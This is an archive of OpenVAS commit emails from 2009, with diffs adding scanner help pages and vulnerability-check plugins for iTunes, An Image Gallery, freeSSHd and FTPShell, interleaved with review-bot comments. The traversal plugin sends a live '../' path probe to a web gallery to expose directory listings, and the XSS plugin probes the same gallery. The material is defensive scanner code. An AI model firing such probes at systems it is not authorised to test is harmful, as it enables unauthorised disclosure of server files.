From scm-commit at wald.intevation.org Thu Oct 1 00:40:34 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 00:40:34 +0200 (CEST) Subject: [Openvas-commits] r5346 - in trunk/gsa: . src/html/src/help Message-ID: <20090930224034.B3D4985D918E@pyrosoma.intevation.org> Author: jan Date: 2009-10-01 00:40:33 +0200 (Thu, 01 Oct 2009) New Revision: 5346 Added: trunk/gsa/src/html/src/help/configure_targets.htm4 trunk/gsa/src/html/src/help/new_task.htm4 Modified: trunk/gsa/ChangeLog Log: * src/html/src/help/configure_targets.htm4, src/html/src/help/new_task.htm4: New. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2009-09-30 20:31:41 UTC (rev 5345) +++ trunk/gsa/ChangeLog 2009-09-30 22:40:33 UTC (rev 5346) @@ -1,3 +1,8 @@ +2009-10-01 Jan-Oliver Wagner + + * src/html/src/help/configure_targets.htm4, + src/html/src/help/new_task.htm4: New. + 2009-09-30 Jan-Oliver Wagner * src/html/src/img/start.png, src/html/src/img/refresh.png, Added: trunk/gsa/src/html/src/help/configure_targets.htm4 =================================================================== --- trunk/gsa/src/html/src/help/configure_targets.htm4 2009-09-30 20:31:41 UTC (rev 5345) +++ trunk/gsa/src/html/src/help/configure_targets.htm4 2009-09-30 22:40:33 UTC (rev 5346) @@ -0,0 +1,120 @@ +m4_define(`PAGE_TITLE', `Help: Configure Targets') +m4_include(`header.m4') + +
Help Contents
+
Jump to dialog

+ +

Configure Targets

+ +

+Any task is associated with +a target. +The configured targets will appear as selection +in the dialog for creating a new task. +

+ + +

New Target

+ +

+For creating a new target the dialog offers these entries. +Hit the button "Create Target" to submit the new target. +The list of targets will be updated. +

+ +

+Note on hosts: incorrect syntax for hosts will not be +warned but rather accepted. When applied for a scan, +only correct entries will be used and the rest will be ignored. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
MandatoryMax LengthSyntaxExample
Nameyes80AlphanumericStaging webservers
Hostsyes80Comma separated list of IPs and/or hostnames192.168.1.23, webserv1.mycompany.tld
Commentno40AlphanumericCovers both of our web staging systems
+ + +

Targets

+ +

+This table provides on overview on all configured +targets. The complete contents of the target entries +are shown (name, comment and hosts). +

+ + + + + + + + + + + + + + + + + + +
ColumnDescription
NameShows name of the target and, + if specificied, the comment in brackets below + the name.
HostsThe comma separated list of target hosts, specified + either via hostname or IP.
IPsThe total number of IPs that results from the + hosts specification.
+ + +

Actions

+ +

+For targets only one action is available: to delete an +entry. Editing a target is not foreseen. +You may copy the contents from the list to the above +shown "New Target" dialog and create a new target from this +with a different name. +

+ +

Delete Target

+ +

+Pressing the delete icon +Delete +will immedialy remove the entry and update the list. +

+ +

+Note that if a target is associated with at least one task, it is not possible +to delete it. In this case the button is greyed +out Delete. +

+ +m4_include(`footer.m4') Added: trunk/gsa/src/html/src/help/new_task.htm4 =================================================================== --- trunk/gsa/src/html/src/help/new_task.htm4 2009-09-30 20:31:41 UTC (rev 5345) +++ trunk/gsa/src/html/src/help/new_task.htm4 2009-09-30 22:40:33 UTC (rev 5346) @@ -0,0 +1,55 @@ +m4_define(`PAGE_TITLE', `Help: New task') +m4_include(`header.m4') + +
Help Contents
+
Jump to dialog

+ +

New task

+ +

+For creating a new task +you have to provide the following elements: +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
MandatoryMax LengthSyntaxExample
Task Nameyes80AlphanumericAll Windows desktops in-depth
Scan Typeyes---One of the + configured scan configs. + Full and fast
Scan Targetsyes---One of the + configured targets.The Windows Desktops
+ +

+Pressing button "Create Task" will add a new entry to the list +of tasks and return to the Tasks +overview. +

+ +m4_include(`footer.m4') From scm-commit at wald.intevation.org Thu Oct 1 00:43:43 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 00:43:43 +0200 (CEST) Subject: [Openvas-commits] r5347 - in trunk/gsa: . src/html/src/img Message-ID: <20090930224343.24D2E85D9F42@pyrosoma.intevation.org> Author: jan Date: 2009-10-01 00:43:42 +0200 (Thu, 01 Oct 2009) New Revision: 5347 Added: trunk/gsa/src/html/src/img/new.png Modified: trunk/gsa/ChangeLog Log: * src/html/src/img/new.png: New. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2009-09-30 22:40:33 UTC (rev 5346) +++ trunk/gsa/ChangeLog 2009-09-30 22:43:42 UTC (rev 5347) @@ -1,5 +1,9 @@ 2009-10-01 Jan-Oliver Wagner + * src/html/src/img/new.png: New. + +2009-10-01 Jan-Oliver Wagner + * src/html/src/help/configure_targets.htm4, src/html/src/help/new_task.htm4: New. Added: trunk/gsa/src/html/src/img/new.png =================================================================== (Binary files differ) Property changes on: trunk/gsa/src/html/src/img/new.png ___________________________________________________________________ Name: svn:mime-type + application/octet-stream From scm-commit at wald.intevation.org Thu Oct 1 12:15:32 2009 
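Review bot: The help text added in configure_targets.htm4 has three typos that will be shown to users: "provides on overview on all configured targets" in the Targets section (should read "an overview of"), "if specificied" in the Name row of the column table, and "will immedialy remove the entry" under Delete Target. The "Note on hosts" paragraph also says that malformed host entries are accepted without a warning and ignored at scan time, which means a target can end up covering fewer hosts than the operator intended. Please state in the "IPs" column description whether that count includes only the entries that will actually be scanned, so the reader has a way to spot dropped entries.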
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 12:15:32 +0200 (CEST) Subject: [Openvas-commits] r5348 - in trunk/openvas-plugins: . scripts Message-ID: <20091001101532.81A21865F480@pyrosoma.intevation.org> Author: chandra Date: 2009-10-01 12:15:29 +0200 (Thu, 01 Oct 2009) New Revision: 5348 Added: trunk/openvas-plugins/scripts/gb_apple_itunes_pls_file_bof_vuln_oct09.nasl trunk/openvas-plugins/scripts/secpod_an_image_gallery_dir_trav_vuln.nasl trunk/openvas-plugins/scripts/secpod_an_image_gallery_xss_vuln.nasl trunk/openvas-plugins/scripts/secpod_freesshd_detect.nasl trunk/openvas-plugins/scripts/secpod_freesshd_pre_auth_dos_vuln.nasl trunk/openvas-plugins/scripts/secpod_ftpshell_client_detect.nasl trunk/openvas-plugins/scripts/secpod_ftpshell_client_pasv_bof_vuln.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/ChangeLog 2009-10-01 10:15:29 UTC (rev 5348) @@ -1,3 +1,14 @@ +2009-10-01 Chandrashekhar B + + * scripts/secpod_an_image_gallery_xss_vuln.nasl, + scripts/secpod_ftpshell_client_detect.nasl, + scripts/secpod_freesshd_pre_auth_dos_vuln.nasl, + scripts/secpod_ftpshell_client_pasv_bof_vuln.nasl, + scripts/secpod_freesshd_detect.nasl, + scripts/secpod_an_image_gallery_dir_trav_vuln.nasl, + scripts/gb_apple_itunes_pls_file_bof_vuln_oct09.nasl: + Added new plugins. + 2009-09-29 Thomas Reinke * scripts/gb_apache_tomcat_xss_vuln.nasl: Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/cve_current.txt 2009-10-01 10:15:29 UTC (rev 5348) 
@@ -74,11 +74,18 @@ CVE-2009-3327 SecPod CVE-2009-3330 SecPod CVE-2009-3369 SecPod -CVE-2009-2817 SecPod -CVE-2009-3366 SecPod -CVE-2009-3367 Secpod -CVE-2009-3364 SecPod -CVE-2009-3340 SecPod +CVE-2009-2817 SecPod svn L +CVE-2009-3366 SecPod svn R +CVE-2009-3367 Secpod svn R +CVE-2009-3364 SecPod svn L +CVE-2009-3340 SecPod svn L CVE-2009-3431 SecPod CVE-2009-3444 SecPod +CVE-2009-3455 SecPod +CVE-2009-3454 SecPod +CVE-2009-3456 SecPod +CVE-2009-3471 SecPod +CVE-2009-3473 SecPod +CVE-2009-3472 SecPod +CVE-2009-3478 SecPod Added: trunk/openvas-plugins/scripts/gb_apple_itunes_pls_file_bof_vuln_oct09.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_apple_itunes_pls_file_bof_vuln_oct09.nasl 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/scripts/gb_apple_itunes_pls_file_bof_vuln_oct09.nasl 2009-10-01 10:15:29 UTC (rev 5348) 
@@ -0,0 +1,86 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_apple_itunes_pls_file_bof_vuln_oct09.nasl 5062 2009-10-01 20:13:12Z oct $ +# +# Apple iTunes '.pls' Files Buffer Overflow Vulnerability +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801105); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-2817"); + script_bugtraq_id(36478); + script_name("Apple iTunes '.pls' Files Buffer Overflow Vulnerability"); + desc = " + Overview: This host has Apple iTunes installed, which is prone to Buffer + Overflow vulnerability. + + Vulnerability Insight: + The flaw exists in the handling of specially crafted '.pls' files. It fails + to bounds-check user-supplied data before copying it into an insufficiently + sized buffer. + + Impact: + Successful exploitation will let the attacker to execute arbitrary code within + the context of the affected application, failed exploit attempts will result in + a denial of service condition. + + Impact Level: Application + + Affected Software/OS: + Apple iTunes version prior to 9.0.1 on Windows. 
+ + Fix: Upgrade to Apple iTunes Version 9.0.1 + http://www.apple.com/itunes/download + + References: + http://support.apple.com/kb/HT3884 + http://lists.apple.com/archives/security-announce/2009/Sep/msg00006.html + + CVSS Score: + CVSS Base Score : 9.3 (AV:N/AC:M/Au:NR/C:C/I:C/A:C) + CVSS Temporal Score : 6.9 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of Apple iTunes"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Buffer overflow"); + script_dependencies("secpod_apple_itunes_detection_win_900123.nasl"); + script_require_keys("iTunes/Win/Ver"); + exit(0); +} + + +include("version_func.inc"); + +itunesVer = get_kb_item("iTunes/Win/Ver"); +if(!itunesVer){ + exit(0); +} + +# Check for iTunes version prior to 9.0.1 (9.0.1.8) +if(version_is_less(version:itunesVer, test_version:"9.0.1.8")){ + security_hole(0); +} Added: trunk/openvas-plugins/scripts/secpod_an_image_gallery_dir_trav_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_an_image_gallery_dir_trav_vuln.nasl 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/scripts/secpod_an_image_gallery_dir_trav_vuln.nasl 2009-10-01 10:15:29 UTC (rev 5348) 
@@ -0,0 +1,109 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: secpod_an_image_gallery_dir_trav_vuln.nasl 5060 2009-09-30 20:38:56Z sep $ +# +# An Image Gallery Directory Traversal Vulnerability +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(901037); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3366"); + script_name("An Image Gallery Directory Traversal Vulnerability"); + desc = " + Overview: This host is running An Image Gallery and is prone to Directory + Traversal vulnerability. + + Vulnerability Insight: + Input passed to the 'path' parameter in 'navigation.php' is not properly + verified before being used to generate and display folder contents. + + Impact: + Successful exploitation will let the attacker to gain information about + directory and file locations. + + Impact Level: System/Application. + + Affected Software/OS: + An Image Gallery version 1.0 and prior. + + Fix: + No solution or patch is available as on 30th September, 2009. Information + regarding this issue will be updated once the solution details are available. 
+ For updates refer, http://plohni.com/wb/content/php/Free_scripts.php + + References: + http://secunia.com/advisories/36680 + http://www.milw0rm.com/exploits/9636 + http://xforce.iss.net/xforce/xfdb/53148 + + CVSS Score: + CVSS Base Score : 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N) + CVSS Temporal Score : 4.5 + Risk factor: Medium"; + + script_description(desc); + script_summary("Check for the version of An Image Gallery"); + script_category(ACT_MIXED_ATTACK); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Web application abuses"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +anPort = get_http_port(default:80); +if(!anPort){ + anPort = 80; +} + +if(!get_port_state(anPort)){ + exit(0); +} + +if(safe_checks()){ + exit(0); +} + +foreach dir (make_list("/", "/image_gallery", "/gallery", "/album", cgi_dirs())) +{ + sndReq = http_get(item:string(dir + "/main.php"), port:anPort); + rcvRes = http_send_recv(port:anPort, data:sndReq); + + if("An image gallery" >< rcvRes) + { + request = http_get(item:dir + "/navigation.php?path=../../../../../../../", + port:anPort); + response = http_send_recv(port:anPort, data:request); + + if(("WINDOWS" >< response) || ("root" >< response)) + { + security_warning(anPort); + exit(0); + } + } +} Property changes on: trunk/openvas-plugins/scripts/secpod_an_image_gallery_dir_trav_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/secpod_an_image_gallery_xss_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_an_image_gallery_xss_vuln.nasl 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/scripts/secpod_an_image_gallery_xss_vuln.nasl 2009-10-01 10:15:29 UTC (rev 5348) 
@@ -0,0 +1,108 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: secpod_an_image_gallery_xss_vuln.nasl 5060 2009-09-30 15:11:27Z sep $ +# +# An Image Gallery Multiple Cross-Site Scripting Vulnerability +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(901038); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3367"); + script_name("An Image Gallery Multiple Cross-Site Scripting Vulnerability"); + desc = " + Overview: The host is running An Image Gallery and is prone to Multiple + Cross-Site Scripting Vulnerability. + + Vulnerability Insight: + Input passed to the 'path' parameter in 'index.php' and 'main.php' and to + the 'show' parameter in 'main.php' is not properly sanitised before being + returned to the user. + + Impact: + Successful exploitation could allow remote attackers to execute arbitrary + HTML and script code in a user's browser session in the context of an + affected site. + + Impact Level:System/Application. + + Affected Software/OS: + An Image Gallery version 1.0 and prior. 
+ + Fix: No solution or patch is available as on 30th September, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://plohni.com/wb/content/php/Free_scripts.php + + References: + http://secunia.com/advisories/36680 + + CVSS Score: + CVSS Base Score : 4.3 (AV:N/AC:M/Au:NR/C:N/I:P/A:N) + CVSS Temporal Score : 3.9 + Risk factor: Medium"; + + script_description(desc); + script_summary("Check for the version of An Image Gallery"); + script_category(ACT_MIXED_ATTACK); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Web application abuses"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +anPort = get_http_port(default:80); +if(!anPort){ + anPort = 80; +} + +if(!get_port_state(anPort)){ + exit(0); +} + +if(safe_checks()){ + exit(0); +} + +foreach dir (make_list("/", "/image_gallery", "/gallery", "/album", cgi_dirs())) +{ + sndReq = http_get(item:string(dir + "/main.php"), port:anPort); + rcvRes = http_send_recv(port:anPort, data:sndReq); + + if("An image gallery" >< rcvRes) + { + request = http_get(item:dir + "/main.php?show=",port:anPort); + response = http_send_recv(port:anPort, data:request); + + if("Exploit-XSS" >< response) + { + security_warning(anPort); + exit(0); + } + } +} Added: trunk/openvas-plugins/scripts/secpod_freesshd_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_freesshd_detect.nasl 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/scripts/secpod_freesshd_detect.nasl 2009-10-01 10:15:29 UTC (rev 5348) 
@@ -0,0 +1,70 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: secpod_freesshd_detect.nasl 5058 2009-09-30 13:14:28Z sep $ +# +# freeSSHd Version Detection +# +# Authors: +# Nikita MR +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(900959); + script_version("$Revision: 1.0 $"); + script_name("freeSSHd Version Detection"); + desc = " + Overview: This script detects the installed version of freeSSHd and sets + the reuslt in KB. 
+ + Risk Factor: Informational"; + + script_description(desc); + script_summary("Set KB for the version of freeSSHd"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Service detection"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_keys("SMB/WindowsVersion"); + script_require_ports(139, 445); + exit(0); +} + + +include("smb_nt.inc"); +include("secpod_smb_func.inc"); + +if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); +} + +key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"; +foreach item (registry_enum_keys(key:key)) +{ + sshdName = registry_get_sz(key:key + item, item:"DisplayName"); + + if("freeSSHd" >< sshdName) + { + sshdVer = eregmatch(pattern:"freeSSHd ([0-9.]+)", string:sshdName); + + if(!isnull(sshdVer[1])){ + set_kb_item(name:"freeSSHd/Ver", value:sshdVer[1]); + } + } +} Property changes on: trunk/openvas-plugins/scripts/secpod_freesshd_detect.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/secpod_freesshd_pre_auth_dos_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_freesshd_pre_auth_dos_vuln.nasl 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/scripts/secpod_freesshd_pre_auth_dos_vuln.nasl 2009-10-01 10:15:29 UTC (rev 5348) 
@@ -0,0 +1,86 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: secpod_freesshd_pre_auth_dos_vuln.nasl 5058 2009-09-30 15:01:39Z sep $ +# +# freeSSHd Pre-Authentication Error Remote DoS Vulnerability +# +# Authors: +# Nikita MR +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +################################################################################ + +if(description) +{ + script_id(900960); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3340"); + script_bugtraq_id(36235); + script_name("freeSSHd Pre-Authentication Error Remote DoS Vulnerability"); + desc = " + Overview: This host has freeSSHd installed and is prone to Denial of Service + vulnerability. + + Vulnerability Insight: + The flaw is caused due to an unspecified pre-authentication error. + + Impact: + Successful attack could allow attackers to crash application to cause + denial of service. + + Impact Level: Application + + Affected Software/OS: + freeSSHd version 1.2.4 and prior. + + Fix: No solution or patch is available as on 30th September, 2009. Information + regarding this issue will be updated once the solution details are available. 
+ For updates refer, http://www.freesshd.com/ + + References: + http://intevydis.com/vd-list.shtml + http://www.intevydis.com/blog/?p=57 + http://secunia.com/advisories/36506 + http://securitytracker.com/alerts/2009/Sep/1022811.html + + CVSS Score: + CVSS Base Score : 5.0 (AV:N/AC:L/Au:NR/C:N/I:N/A:P) + CVSS Temporal Score : 4.5 + Risk factor: Medium"; + + script_description(desc); + script_summary("Check for the version of freeSSHd"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Denial of Service"); + script_dependencies("secpod_freesshd_detect.nasl"); + script_require_keys("freeSSHd/Ver"); + script_require_ports("Services/ssh", 22); + exit(0); +} + + +include("version_func.inc"); + +sshdVer = get_kb_item("freeSSHd/Ver"); +if(sshdVer) +{ + # Grep for freeSSHd version 1.2.4 and prior + if(version_is_less_equal(version:sshdVer, test_version:"1.2.4")){ + security_warning(sshdPort); + } +} Property changes on: trunk/openvas-plugins/scripts/secpod_freesshd_pre_auth_dos_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/secpod_ftpshell_client_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_ftpshell_client_detect.nasl 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/scripts/secpod_ftpshell_client_detect.nasl 2009-10-01 10:15:29 UTC (rev 5348) 
@@ -0,0 +1,97 @@ +############################################################################## +# OpenVAS Vulnerability Test +# $Id: secpod_ftpshell_client_detect.nasl 5061 2009-09-30 16:54:10Z sep $ +# +# FTPShell Client Version Detection +# +# Authors: +# Nikita MR +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(900961); + script_version("$Revision: 1.0$"); + script_name("FTPShell Client Version Detection"); + desc = " + Overview: This script detects the installed version of FTPShell Client + and sets the result in KB. 
+ + Risk factor: Informational"; + + script_description(desc); + script_summary("Set the KB for the version of FTPShell Client"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Service detection"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_keys("SMB/WindowsVersion"); + script_require_ports(139, 445); + exit(0); +} + + +include("smb_nt.inc"); +include("secpod_smb_func.inc"); + +if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); +} + +key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"; + +foreach item (registry_enum_keys(key:key)) +{ + fclntName = registry_get_sz(key:key + item, item:"DisplayName"); + + if("FTPShell Client" >< fclntName) + { + fclntPath = registry_get_sz(key:key + item, item:"UninstallString"); + fclntPath = ereg_replace(pattern:'\"(.*)\"',replace:"\1",string:fclntPath); + fclntPath = fclntPath - 'unins000.exe' + 'readme.txt'; + + if(isnull(fclntPath)){ + exit(0); + } + + share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:fclntPath); + file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:fclntPath); + readmeText = read_file(share:share, file:file, offset:0, count:500); + + if(readmeText) + { + shellVer = eregmatch(pattern:"Version +: ([0-9.]+).?([a-zA-Z]+.?[0-9]+)?", + string:readmeText); + if(!isnull(shellVer[1])) + { + if(!isnull(shellVer[2])) + { + shellVer[2] = ereg_replace(pattern:" ",string:shellVer[2],replace:""); + shellVer = shellVer[1] + "." 
+ shellVer[2]; + } + else + shellVer = shellVer[1]; + + if(shellVer){ + set_kb_item(name:"FTPShell/Client/Ver", value:shellVer); + } + } + } + } +} Property changes on: trunk/openvas-plugins/scripts/secpod_ftpshell_client_detect.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/secpod_ftpshell_client_pasv_bof_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_ftpshell_client_pasv_bof_vuln.nasl 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/scripts/secpod_ftpshell_client_pasv_bof_vuln.nasl 2009-10-01 10:15:29 UTC (rev 5348) 
@@ -0,0 +1,83 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: secpod_ftpshell_client_pasv_bof_vuln.nasl 5061 2009-09-30 16:18:42Z sep $ +# +# FTPShell Client PASV Command Buffer Overflow Vulnerability +# +# Authors: +# Nikita MR +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(900962); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3364"); + script_bugtraq_id(36327); + script_name("FTPShell Client PASV Command Buffer Overflow Vulnerability"); + desc = " + Overview: This host is running FTPShell Client and is prone to Buffer + Overflow vulnerability. + + Vulnerability Insight: + A buffer overflow error occurs due to improper bounds checking when handling + overly long PASV messages sent by the server. + + Impact: + Successful exploitation will let the user execute arbitrary code and crash + the application to cause denial of service. + + Affected Software/OS: + FTPShell Client 4.1 RC2 and prior. + + Fix: No solution or patch is available as on 30th September, 2009. Information + regarding this issue will be updated once the solution details are available. 
+ For updates refer, http://www.ftpshell.com/ + + References: + http://secunia.com/advisories/36628 + http://www.milw0rm.com/exploits/9613 + http://xforce.iss.net/xforce/xfdb/53126 + + CVSS Score: + CVSS Base Score : 9.3 (AV:N/AC:M/Au:NR/C:C/I:C/A:C) + CVSS Temporal Score : 8.4 + Risk factor: Critical"; + + script_description(desc); + script_summary("Check for the version of FTPShell Client"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Buffer overflow"); + script_dependencies("secpod_ftpshell_client_detect.nasl"); + script_require_keys("FTPShell/Client/Ver"); + exit(0); +} + + +include("version_func.inc"); + +shellVer = get_kb_item("FTPShell/Client/Ver"); +if(isnull(shellVer)){ + exit(0); +} + +if(version_is_less_equal(version:shellVer, test_version:"4.1.RC2")){ + security_hole(0); +} Property changes on: trunk/openvas-plugins/scripts/secpod_ftpshell_client_pasv_bof_vuln.nasl ___________________________________________________________________ Name: svn:executable + * From scm-commit at wald.intevation.org Thu Oct 1 18:57:34 2009 
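Review bot: The cve_current.txt hunk appends "svn L" or "svn R" to five existing entries, but the seven entries it adds below them (CVE-2009-3455 through CVE-2009-3478) carry no such column, and neither the file lines shown nor the ChangeLog entry says what the codes mean. Please document the column and apply it consistently. The re-touched line "CVE-2009-3367 Secpod svn R" also keeps the "Secpod" spelling where every neighbouring line uses "SecPod".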
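Review bot: The success test at the end of secpod_an_image_gallery_dir_trav_vuln.nasl, if(("WINDOWS" >< response) || ("root" >< response)), matches any response body that contains either word, so an error page or a gallery folder that happens to be named "root" would be reported as vulnerable. Please match on something specific to the listing that navigation.php returns. Two smaller points in the same hunk: script_summary reads "Check for the version of An Image Gallery" although the script never reads a version (and version_func.inc is included but unused), and dir + "/main.php" yields "//main.php" for the "/" entry of make_list.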
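Review bot: In secpod_an_image_gallery_xss_vuln.nasl the script_summary "Check for the version of An Image Gallery" does not describe what the script does: it is ACT_MIXED_ATTACK, exits under safe_checks(), and decides on the content of a response to main.php, with no version comparison anywhere. Please reword the summary and drop the unused include("version_func.inc"). The description line "Impact Level:System/Application." is also missing the space after the colon that the other plugins in this commit use.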
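Review bot: The description string in secpod_freesshd_detect.nasl misspells "result" as "reuslt" ("sets the reuslt in KB"). This text is displayed to users of the scanner, so please correct it before the plugin goes into a feed.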
